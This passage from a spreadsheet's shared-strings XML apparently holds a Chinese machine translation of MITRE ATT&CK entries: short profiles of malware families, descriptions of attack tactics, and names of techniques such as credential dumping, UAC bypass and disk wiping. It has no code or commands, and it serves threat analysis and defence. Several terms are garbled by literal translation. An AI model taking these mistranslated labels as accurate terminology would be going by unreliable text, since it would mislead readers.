    <t>BLUELIGHT是一种远程访问木马，它是在2021年初首次观察到的。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Brave Prince</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Brave Prince是一种韩语植入物，2017年12月首次在野外观察到。它包含与金龙相似的代码和行为，与金龙和RunningRAT一起出现在2018年平昌冬奥会周边的运营中。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carbon</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carbon是一个复杂的第二阶段后门和框架，可以用来窃取受害者的敏感信息。Turla有选择地将碳用于中亚的政府和外交相关组织。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Circles</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Circles利用信令系统7（SS7）的弱点，即用来路由电话的协议套件，既跟踪移动设备的位置，又拦截语音通话和短信。它可以连接到电信公司的基础设施，也可以作为云服务购买。据报道，这些圈子与NSO集团有关。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cuba</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cuba是一个基于Windows的勒索软件家族，至少自2019年12月以来，该家族一直被用于打击北美、南美以及欧洲的金融机构、技术和物流组织。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Desert Scorpion</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Desert Scorpion是一种监视软件，其目标是中东地区，特别是巴勒斯坦境内的个人。沙漠蝎子被怀疑是由威胁演员APT-C-23操纵的。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FruitFly</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FruitFly是用来监视mac用户的。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gold Dragon</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gold Dragon是一种韩语，数据收集植入物，2017年7月在韩国首次在野外观察到。金龙与勇敢王子和RunningRAT一起被用于针对2018年平昌冬奥会相关组织的行动。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hacking Team UEFI Rootkit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hacking Team UEFI Rootkit是由公司黑客团队开发的Rootkit，作为远程访问软件的持久性方法。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HALFBAKED</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HALFBAKED是一个恶意软件家族，由多个组件组成，旨在在受害者网络中建立持久性。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Imminent Monitor</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Imminent Monitor是一种商品远程访问工具（RAT），从2012年到2019年出售，当时进行了拆除即将到来的监控基础设施的行动。这种老鼠的各种破解版本和变种仍在流通。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>INSOMNIA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>INSOMNIA是邪恶之眼组织使用的间谍软件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Keydnap</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Keydnap窃取用户钥匙链的内容，同时保持永久后门。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Machete</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Machete是弯刀使用的网络间谍工具集。这是一个基于Python的后门，目标是Windows机器，最早出现在2010年。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Maze</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Maze以前被称为“ChaCha”，于2019年5月被发现。除了对受害者机器上的文件进行加密以产生影响外，迷宫运营商在加密之前还开展信息窃取活动，并将信息发布到网上，以勒索受影响的公司。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mosquito</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mosquito是图拉使用的Win32后门。蚊子由三部分组成：安装器、发射器和后门。主后门名为CommanderDell，由loader程序启动。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NanHaiShu</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NanHaiShu是利维坦使用的远程访问工具和JScript后门。《南海书》被用来打击与南海争端有关的政府和私营部门组织。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Nebulae</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Nebulae是一个后门，至少从2020年起，奈康就开始使用它。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>P2P ZeuS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>P2P ZeuS是宙斯僵尸网络泄露版本的一个封闭源代码分支。它对泄露的版本进行了改进，包括对等体系结构。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pteranodon</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pteranodon是Gamaredon集团使用的定制后门。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Raindrop</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Raindrop是APT29使用的装载机，在与2020年太阳林网络入侵相关的调查中，在一些受害者机器上发现了雨滴。它是在2021年1月被发现的，至少在2020年5月以后就被使用了。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Revenge RAT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Revenge RAT是一个免费使用的远程访问工具，用英文编写。净（C#）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RIPTIDE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RIPTIDE是APT12使用的代理感知后门。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rising Sun</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rising Sun是一个模块化的后门恶意软件，广泛用于神枪手行动。据观察，该恶意软件的目标是世界各地的核、国防、能源和金融服务公司。旭日使用Lazarus Group特洛伊木马Duuzer的源代码。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>route</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>route可用于查找或更改本地系统IP路由表中的信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rover</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rover是被怀疑用于间谍目的的恶意软件。2015年，它被用于发送给印度驻阿富汗大使的一封有针对性的电子邮件中。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ruler</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ruler是滥用Microsoft Exchange服务的工具。它在GitHub上公开可用，并通过命令行执行该工具。统治者的创建者还发布了一个防御工具NotRuler来检测其使用情况。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RuMMS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RuMMS是安卓恶意软件家族。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Seth-Locker</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Seth-Locker是一种具有至少2021的远程控制能力的勒索软件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ShimRat</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ShimRat被怀疑是中国的对手莫方用于针对多个国家和部门的行动，包括政府、军事、关键基础设施、汽车和武器开发。“ShimRat”这个名字来源于恶意软件广泛使用Windows应用程序填充来保持持久性。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Stealth Mango</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Stealth Mango是一种安卓恶意软件，据报道，该软件已被成功用于危害政府官员、军人、医疗专业人员和平民的移动设备。被称为Tangelo的iOS恶意软件据信来自同一个开发者。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan-SMS.AndroidOS.Agent.ao</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan-SMS.AndroidOS.Agent.ao是安卓恶意软件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan-SMS.AndroidOS.FakeInst.a</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan-SMS.AndroidOS.FakeInst.a是安卓恶意软件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan-SMS.AndroidOS.OpFake.a</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan-SMS.AndroidOS.OpFake.a是安卓恶意软件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan.Karagany</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan.Karagany是一款用于侦察的模块化远程访问工具，与蜻蜓和蜻蜓2.0相关联。特洛伊木马的源代码。Karagany源于2010年泄露的Dream Loader恶意软件，并在地下论坛上出售。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan.Mebromi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trojan.Mebromi是BIOS级别的恶意软件，在MBR之前控制受害者。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Unknown Logger</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Unknown Logger是一个公开发布的免费后门。负责季风运动的参与者使用了后门的1.5版。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VERMIN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VERMIN是一个远程访问工具写在微软。NET框架。它主要由原始代码组成，但也有一些开源代码。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WINDSHIELD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WINDSHIELD是APT32使用的标志性后门。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Wiper</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Wiper是2013年3月韩国银行和媒体公司违规时使用的一系列破坏性恶意软件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>X-Agent for Android</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>X-Agent for Android是安卓恶意软件，被放在乌克兰炮兵瞄准应用程序的重新打包版本中。据报道，该恶意软件检索到了受害者设备使用地点的一般位置数据，因此可能表明乌克兰大炮的潜在位置。它和筷子是分开追踪的吗。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YiSpecter</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YiSpecter和非越狱iOS设备的iSpecter iOS恶意软件。它也是独一无二的，因为它滥用iOS系统中的私有API来实现功能。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>技术</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>企业</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>终端</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>侦察</t>
  </si>
  <si>
    <t>初始访问</t>
  </si>
  <si>
    <t>发现</t>
  </si>
  <si>
    <t>横向运动</t>
  </si>
  <si>
    <t>收集</t>
  </si>
  <si>
    <t>渗出</t>
  </si>
  <si>
    <t>影响</t>
  </si>
  <si>
    <t>执行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络效应</t>
  </si>
  <si>
    <t>维持</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>资源发现</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>远程服务影响</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>提升权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防御规避</t>
  </si>
  <si>
    <t>访问凭证</t>
  </si>
  <si>
    <t>命令和控制</t>
  </si>
  <si>
    <t>侦察包括让对手主动或被动收集信息以支持目标定位的技术。此类信息可能包括受害者组织、基础设施或员工/人员的详细信息。敌方可以利用这些信息在敌方生命周期的其他阶段提供帮助，例如使用收集的信息来规划和执行初始访问，确定妥协后目标的范围和优先级，或者推动和领导进一步的侦察工作。</t>
  </si>
  <si>
    <t>初始访问包括使用各种进入向量在网络中获得初始立足点的技术。用于站稳脚跟的技术包括有针对性的网络钓鱼和利用面向公众的web服务器上的弱点。通过初始访问获得的立足点可能允许继续访问，如有效帐户和使用外部远程服务，或者可能由于更改密码而限制使用。</t>
  </si>
  <si>
    <t>执行是指在本地或远程系统上运行由对手控制的代码的技术。运行恶意代码的技术通常与所有其他战术中的技术相结合，以实现更广泛的目标，如探索网络或窃取数据。例如，对手可能会使用远程访问工具来运行执行远程系统发现的PowerShell脚本。</t>
  </si>
  <si>
    <t>防御规避包括敌方在整个妥协过程中用来避免被发现的技术。用于防御规避的技术包括卸载/禁用安全软件或混淆/加密数据和脚本。对手还利用和滥用受信任的进程来隐藏和伪装他们的恶意软件。其他战术的技术在这里交叉列出，当这些技术包括颠覆防御的额外好处时。</t>
  </si>
  <si>
    <t>发现包括敌方可能用来获取系统和内部网络信息的技术。这些技术可以帮助对手在决定如何行动之前观察环境并确定自己的方向。他们还允许对手探索他们可以控制的东西以及他们的切入点周围的东西，以发现它如何有利于他们当前的目标。本机操作系统工具通常用于这一事后信息收集目标。</t>
  </si>
  <si>
    <t>横向移动包括敌方用来进入和控制网络上远程系统的技术。要实现他们的主要目标，通常需要探索网络以找到他们的目标，然后获得访问权限。实现他们的目标通常需要通过多个系统和账户来获取利润。对手可能会安装自己的远程访问工具来完成横向移动，或者使用本机网络和操作系统工具的合法凭据，这可能更隐蔽。</t>
  </si>
  <si>
    <t>收集包括敌方可能用来收集信息的技术，以及收集信息的来源，这些来源与贯彻敌方的目标有关。通常，收集数据后的下一个目标是窃取（过滤）数据。常见的目标源包括各种驱动器类型、浏览器、音频、视频和电子邮件。常见的收集方法包括截图和键盘输入。</t>
  </si>
  <si>
    <t>影响包括对手通过操纵业务和运营流程来破坏可用性或损害完整性的技术。用于影响的技术可能包括破坏或篡改数据。在某些情况下，业务流程可能看起来不错，但可能已被修改，以利于对手的目标。这些技术可能被对手用来实现他们的最终目标，或为违反保密规定提供掩护。</t>
  </si>
  <si>
    <t>初始访问策略代表了对手用来在移动设备上获得初始立足点的向量。</t>
  </si>
  <si>
    <t>执行包括导致在移动设备上运行由对手控制的代码的技术。运行恶意代码的技术通常与所有其他战术中的技术相结合，以实现更广泛的目标，如探索网络或窃取数据。</t>
  </si>
  <si>
    <t>防御规避包括敌方可能用来逃避检测或避免其他防御的技术。有时，这些行动与其他类别的技术相同或不同，具有颠覆特定防御或缓解的额外好处。防御规避可被视为敌方适用于作战所有其他阶段的一组属性。</t>
  </si>
  <si>
    <t>发现包括让对手了解移动设备和潜在的其他网络系统特征的技术。当对手获得对新系统的访问权限时，他们必须使自己适应他们现在控制的系统，以及在入侵过程中，该系统的运行会给他们当前的目标或总体目标带来什么好处。操作系统可能会提供有助于此泄露后信息收集阶段的功能。</t>
  </si>
  <si>
    <t>横向移动包括使对手能够访问和控制网络上远程系统的技术，可以但不一定包括在远程系统上执行工具。横向移动技术可以让对手从系统中收集信息，而不需要额外的工具，如远程访问工具。</t>
  </si>
  <si>
    <t>收集包括用于在过滤前从目标网络识别和收集信息（如敏感文件）的技术。这一类别还包括系统或网络上的敌方可能寻找信息进行过滤的位置。</t>
  </si>
  <si>
    <t>在移动环境中，移动设备经常连接到企业控制之外的网络，如蜂窝网络或公共Wi-Fi网络。对手可能试图通过在这些网络上通信，甚至可能通过使用非互联网协议机制，如短消息服务（SMS），来逃避检测。然而，蜂窝网络通常具有数据上限和/或额外的数据费用，这可能会增加敌方通信被检测到的可能性。</t>
  </si>
  <si>
    <t>这一类别指的是基于网络的技术，对手可以使用这些技术来实现其目标，而无需访问移动设备本身。这些技术包括拦截或操纵进出移动设备的网络流量的技术。</t>
  </si>
  <si>
    <t>这一类别指的是涉及远程服务的技术，如供应商提供的云服务（如谷歌硬盘、谷歌查找我的设备或苹果iCloud），或企业移动管理（EMM）/移动设备管理（MDM）服务，对手可能可以使用这些服务来实现其目标，而无需访问移动设备本身。</t>
  </si>
  <si>
    <t>资源发现包括对手创建、购买或破坏/窃取可用于支持目标定位的资源的技术。这些资源包括基础设施、客户或能力。敌方可以利用这些资源在敌方生命周期的其他阶段提供帮助，例如使用购买的域来支持命令和控制，将钓鱼的电子邮件帐户作为初始访问的一部分，或者窃取代码签名证书来帮助防御规避。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>维持包括对手用来在重启、更改凭据和其他可能切断其访问的中断期间保持对系统的访问的技术。用于持久性的技术包括允许他们在系统上保持立足点的任何访问、操作或配置更改，例如替换或劫持合法代码或添加启动代码。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>维持是指对移动设备的任何访问、操作或配置更改，从而使攻击者在设备上持久存在。攻击者通常需要通过中断（如设备重新启动，甚至可能是工厂数据重置）来维护对移动设备的访问。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>提升权限由对手用来在系统或网络上获得更高级别权限的技术组成。对手通常可以通过非特权访问进入和探索网络，但需要更高的权限才能实现其目标。常用的方法是利用系统的弱点</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>提升权限包括允许攻击者在移动设备上获得更高级别权限的技术。攻击者可能以非常有限的权限进入移动设备，并且可能需要利用设备的弱点来获得成功执行其任务目标所需的更高权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访问凭证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访问凭证包括窃取帐户名和密码等凭据的技术。用于获取凭据的技术包括密钥记录或凭据转储。使用合法凭证可以让对手访问系统，使其更难检测，并提供创建更多帐户以帮助实现其目标的机会。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访问凭证表示对手可以使用的技术，以获得对密码、令牌、加密密钥或其他值的访问或控制，这些值可能被对手用来获得对资源的未经授权访问。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令和控制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令和控制包括敌方可能用来与受害者网络中受其控制的系统进行通信的技术。对手通常试图模拟正常的预期流量，以避免被发现。根据受害者的网络结构和防御，敌人可以通过多种方式建立不同级别的隐形指挥和控制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令和控制战术代表了对手如何在目标网络中与其控制下的系统进行通信。根据系统配置和网络拓扑，敌方可以通过多种方式建立具有不同隐蔽性的指挥和控制。由于敌方在网络层面上的差异很大，因此仅使用最常见的因素来描述指挥和控制方面的差异。在文档化的方法中仍然有很多特定的技术，这主要是因为定义新协议并使用现有的合法协议和网络服务进行通信是多么容易。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>渗出</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>渗出由对手可能用来从您的网络窃取数据的技术组成。一旦收集到数据，对手通常会将其打包，以避免在删除数据时被发现。这可以包括压缩和加密。从目标网络获取数据的技术通常包括通过其命令和控制通道或备用通道传输数据，还可能包括对传输进行大小限制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>影响</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>影响战术包括敌方为执行其任务目标而使用的技术，但这些技术并不完全适用于其他类别，如收集。任务目标因每个对手的目标而不同，但例子包括收费欺诈、破坏设备数据，或在支付赎金之前将用户锁定在其设备之外。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>滥用高程控制机制</t>
  </si>
  <si>
    <t>Setuid和Setgid</t>
  </si>
  <si>
    <t>绕过用户帐户控制</t>
  </si>
  <si>
    <t>Sudo和Sudo缓存</t>
  </si>
  <si>
    <t>提升执行速度，并提供提示</t>
  </si>
  <si>
    <t>访问令牌操作</t>
  </si>
  <si>
    <t>代币冒充/盗窃</t>
  </si>
  <si>
    <t>使用令牌创建进程</t>
  </si>
  <si>
    <t>父PID欺骗</t>
  </si>
  <si>
    <t>SID历史记录注入</t>
  </si>
  <si>
    <t>删除帐户访问权限</t>
  </si>
  <si>
    <t>帐户发现</t>
  </si>
  <si>
    <t>本地账户</t>
  </si>
  <si>
    <t>域帐户</t>
  </si>
  <si>
    <t>电子邮件帐户</t>
  </si>
  <si>
    <t>云账户</t>
  </si>
  <si>
    <t>账户操纵</t>
  </si>
  <si>
    <t>其他云凭据</t>
  </si>
  <si>
    <t>交换电子邮件委派权限</t>
  </si>
  <si>
    <t>添加Office 365全局管理员角色</t>
  </si>
  <si>
    <t>SSH授权密钥</t>
  </si>
  <si>
    <t>获取基础设施</t>
  </si>
  <si>
    <t>领域</t>
  </si>
  <si>
    <t>DNS服务器</t>
  </si>
  <si>
    <t>虚拟专用服务器</t>
  </si>
  <si>
    <t>服务器</t>
  </si>
  <si>
    <t>僵尸网络</t>
  </si>
  <si>
    <t>网络服务</t>
  </si>
  <si>
    <t>主动扫描</t>
  </si>
  <si>
    <t>扫描IP块</t>
  </si>
  <si>
    <t>漏洞扫描</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS中毒和SMB继电器</t>
  </si>
  <si>
    <t>ARP缓存中毒</t>
  </si>
  <si>
    <t>应用层协议</t>
  </si>
  <si>
    <t>网络协议</t>
  </si>
  <si>
    <t>文件传输协议</t>
  </si>
  <si>
    <t>邮件协议</t>
  </si>
  <si>
    <t>域名服务器</t>
  </si>
  <si>
    <t>应用程序窗口发现</t>
  </si>
  <si>
    <t>归档收集的数据</t>
  </si>
  <si>
    <t>通过实用程序存档</t>
  </si>
  <si>
    <t>通过图书馆存档</t>
  </si>
  <si>
    <t>通过自定义方法存档</t>
  </si>
  <si>
    <t>音频捕获</t>
  </si>
  <si>
    <t>自动收集</t>
  </si>
  <si>
    <t>自动过滤</t>
  </si>
  <si>
    <t>流量复制</t>
  </si>
  <si>
    <t>启动或登录自动启动执行</t>
  </si>
  <si>
    <t>注册表运行键/启动文件夹</t>
  </si>
  <si>
    <t>身份验证包</t>
  </si>
  <si>
    <t>时间提供者</t>
  </si>
  <si>
    <t>Winlogon助手DLL</t>
  </si>
  <si>
    <t>安全支持提供商</t>
  </si>
  <si>
    <t>内核模块和扩展</t>
  </si>
  <si>
    <t>重新打开的应用程序</t>
  </si>
  <si>
    <t>快捷方式修改</t>
  </si>
  <si>
    <t>端口监视器</t>
  </si>
  <si>
    <t>Plist修改</t>
  </si>
  <si>
    <t>打印处理器</t>
  </si>
  <si>
    <t>XDG自动启动条目</t>
  </si>
  <si>
    <t>活动设置</t>
  </si>
  <si>
    <t>登录项</t>
  </si>
  <si>
    <t>启动或登录初始化脚本</t>
  </si>
  <si>
    <t>登录脚本（Windows）</t>
  </si>
  <si>
    <t>登录脚本（Mac）</t>
  </si>
  <si>
    <t>网络登录脚本</t>
  </si>
  <si>
    <t>RC脚本</t>
  </si>
  <si>
    <t>启动项目</t>
  </si>
  <si>
    <t>浏览器书签发现</t>
  </si>
  <si>
    <t>扩充套件</t>
  </si>
  <si>
    <t>浏览器会话劫持</t>
  </si>
  <si>
    <t>密码猜测</t>
  </si>
  <si>
    <t>密码破解</t>
  </si>
  <si>
    <t>凭证填充</t>
  </si>
  <si>
    <t>在主机上建立映像</t>
  </si>
  <si>
    <t>剪贴板数据</t>
  </si>
  <si>
    <t>云基础设施发现</t>
  </si>
  <si>
    <t>云服务仪表板</t>
  </si>
  <si>
    <t>云服务发现</t>
  </si>
  <si>
    <t>云存储对象发现</t>
  </si>
  <si>
    <t>命令和脚本解释器</t>
  </si>
  <si>
    <t>Windows命令外壳</t>
  </si>
  <si>
    <t>python</t>
  </si>
  <si>
    <t>网络设备CLI</t>
  </si>
  <si>
    <t>通过可移动媒体进行通信</t>
  </si>
  <si>
    <t>社交媒体账户</t>
  </si>
  <si>
    <t>泄露客户端软件二进制文件</t>
  </si>
  <si>
    <t>破坏基础设施</t>
  </si>
  <si>
    <t>容器和资源发现</t>
  </si>
  <si>
    <t>创建帐户</t>
  </si>
  <si>
    <t>创建或修改系统进程</t>
  </si>
  <si>
    <t>系统服务</t>
  </si>
  <si>
    <t>Windows服务</t>
  </si>
  <si>
    <t>启动守护程序</t>
  </si>
  <si>
    <t>来自密码存储的凭据</t>
  </si>
  <si>
    <t>钥匙链</t>
  </si>
  <si>
    <t>安全存储器</t>
  </si>
  <si>
    <t>来自Web浏览器的凭据</t>
  </si>
  <si>
    <t>Windows凭据管理器</t>
  </si>
  <si>
    <t>密码管理器</t>
  </si>
  <si>
    <t>数据销毁</t>
  </si>
  <si>
    <t>数据编码</t>
  </si>
  <si>
    <t>标准编码</t>
  </si>
  <si>
    <t>非标准编码</t>
  </si>
  <si>
    <t>为影响而加密的数据</t>
  </si>
  <si>
    <t>来自云存储对象的数据</t>
  </si>
  <si>
    <t>来自配置存储库的数据</t>
  </si>
  <si>
    <t>SNMP（MIB转储）</t>
  </si>
  <si>
    <t>网络设备配置转储</t>
  </si>
  <si>
    <t>来自信息存储库的数据</t>
  </si>
  <si>
    <t>代码存储库</t>
  </si>
  <si>
    <t>来自本地系统的数据</t>
  </si>
  <si>
    <t>来自网络共享驱动器的数据</t>
  </si>
  <si>
    <t>来自可移动媒体的数据</t>
  </si>
  <si>
    <t>数据操纵</t>
  </si>
  <si>
    <t>存储数据操作</t>
  </si>
  <si>
    <t>传输数据操作</t>
  </si>
  <si>
    <t>运行时数据操作</t>
  </si>
  <si>
    <t>数据混淆</t>
  </si>
  <si>
    <t>垃圾数据</t>
  </si>
  <si>
    <t>隐写术</t>
  </si>
  <si>
    <t>协议模拟</t>
  </si>
  <si>
    <t>数据暂存</t>
  </si>
  <si>
    <t>本地数据暂存</t>
  </si>
  <si>
    <t>远程数据转移</t>
  </si>
  <si>
    <t>数据传输大小限制</t>
  </si>
  <si>
    <t>对文件或信息进行除臭/解码</t>
  </si>
  <si>
    <t>部署容器</t>
  </si>
  <si>
    <t>发展能力</t>
  </si>
  <si>
    <t>恶意软件</t>
  </si>
  <si>
    <t>代码签名证书</t>
  </si>
  <si>
    <t>数字证书</t>
  </si>
  <si>
    <t>直接卷访问</t>
  </si>
  <si>
    <t>磁盘擦除</t>
  </si>
  <si>
    <t>磁盘内容擦除</t>
  </si>
  <si>
    <t>磁盘结构擦除</t>
  </si>
  <si>
    <t>域策略修改</t>
  </si>
  <si>
    <t>组策略修改</t>
  </si>
  <si>
    <t>域信任修改</t>
  </si>
  <si>
    <t>域信任发现</t>
  </si>
  <si>
    <t>按妥协行事</t>
  </si>
  <si>
    <t>快速流量DNS</t>
  </si>
  <si>
    <t>域生成算法</t>
  </si>
  <si>
    <t>DNS计算</t>
  </si>
  <si>
    <t>电子邮件收集</t>
  </si>
  <si>
    <t>本地电子邮件收集</t>
  </si>
  <si>
    <t>远程电子邮件收集</t>
  </si>
  <si>
    <t>电子邮件转发规则</t>
  </si>
  <si>
    <t>加密通道</t>
  </si>
  <si>
    <t>对称密码</t>
  </si>
  <si>
    <t>非对称加密</t>
  </si>
  <si>
    <t>端点拒绝服务</t>
  </si>
  <si>
    <t>应用程序或系统开发</t>
  </si>
  <si>
    <t>事件触发执行</t>
  </si>
  <si>
    <t>更改默认文件关联</t>
  </si>
  <si>
    <t>屏幕保护程序</t>
  </si>
  <si>
    <t>Windows Management Instrumentation事件订阅</t>
  </si>
  <si>
    <t>Unix Shell配置修改</t>
  </si>
  <si>
    <t>陷阱</t>
  </si>
  <si>
    <t>LC_加载_动态加法</t>
  </si>
  <si>
    <t>Netsh助手DLL</t>
  </si>
  <si>
    <t>AppCert DLL</t>
  </si>
  <si>
    <t>AppInit DLL</t>
  </si>
  <si>
    <t>应用填隙</t>
  </si>
  <si>
    <t>图像文件执行选项注入</t>
  </si>
  <si>
    <t>PowerShell配置文件</t>
  </si>
  <si>
    <t>组件对象模型劫持</t>
  </si>
  <si>
    <t>执行护栏</t>
  </si>
  <si>
    <t>环境键控</t>
  </si>
  <si>
    <t>基于替代方案的渗出</t>
  </si>
  <si>
    <t>对称加密非C2协议上的渗出</t>
  </si>
  <si>
    <t>非对称加密非C2协议上的渗出</t>
  </si>
  <si>
